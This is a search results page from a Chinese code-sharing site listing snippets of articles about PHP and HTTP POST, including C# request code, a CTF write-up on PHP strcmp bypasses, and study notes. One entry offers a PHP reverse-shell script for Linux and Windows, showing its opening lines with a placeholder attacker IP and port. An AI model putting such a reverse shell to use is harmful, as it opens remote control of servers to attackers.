码迷,mamicode.com
首页 >  
搜索关键字:php post    ( 111083个结果
Http Post Json参数及Json接收
private string HttpRequest(Dictionary<string, object> dic, string url) { string json = JSONhelper.ObjToJson(dic); WebRequest request = WebRequest.Crea ...
分类:Web程序   时间:2021-07-07 17:56:22    阅读次数:0
[极客大挑战 2019]BuyFlag 1
本篇文章通过CTF试题-主要内容就是php-strcmp函数绕过,php弱类型比较 ...
分类:其他好文   时间:2021-07-07 17:54:36    阅读次数:0
暑假学习Flag
暑假学习Flag 系统学习python爬虫,常见库(request,re,threading) 系统学习node.js 刷完所有一分BUU 审计基本的php通用cms漏洞(tp,laravel,托纳多),争取获取一个CNVD 系统学习网络 看3本课外小说 不要浪费感情在不需要的地方了吧,减少无用社交 ...
分类:其他好文   时间:2021-07-06 16:23:59    阅读次数:0
php_bugs学习 02 绕过过滤的空白字符
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
分类:Web程序   时间:2021-07-05 19:06:03    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
php 接口实例
接口定义 interface 关键字定义的类就叫接口 接口实例 <?php //接口定义 interface Human{ //跑步 public function run(); //跳远 public function jump(); } //接口实现 class Person implement ...
分类:Web程序   时间:2021-07-05 18:53:37    阅读次数:0
mitmdump抓取app数据
注:有些app的api接口post的请求有些参数不知从何而来,因此无法模拟客户端post数据,需借助mitmproxy里面的mitmdump来操作。 1. 先用fiddler抓包获取请求的接口 2. 编写解析数据的代码,例如: import json # 这个地方必须这么写 函数名:response ...
分类:移动开发   时间:2021-07-05 18:25:50    阅读次数:0
RESTful规范与常用状态码
阅读目录 GET POST PUT DELETE 回到顶部 GET 安全且幂等 获取表示 变更时获取表示(缓存) 200(OK)-表示已在响应中发出 204(无内容) - 资源有空表示 301(Moved Permanently) - 资源的URI已被更新 303 (See Other) -其他(如 ...
分类:其他好文   时间:2021-07-05 18:23:37    阅读次数:0
C# Post 使用(multipart/form-data)请求数据
public static string HttpPostMultipartFormData(string url, NameValueCollection kVDatas, string method = WebRequestMethods.Http.Post, string encoding= ...
分类:Windows程序   时间:2021-07-05 18:04:31    阅读次数:0
win10安装PHP
1 进入PHP官网 https://www.php.net/ 2 点击download,选择相应的版本,点击windows下载链接 这里我需要下载5.5版本的,而7以前的版本在这个页面上是没有显示的,所以得去别的地方下载,下面的地址都有: https://windows.php.net/downlo ...
分类:Windows程序   时间:2021-07-05 18:02:39    阅读次数:0
111083条   上一页 1 2 3 4 5 ... 11109 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!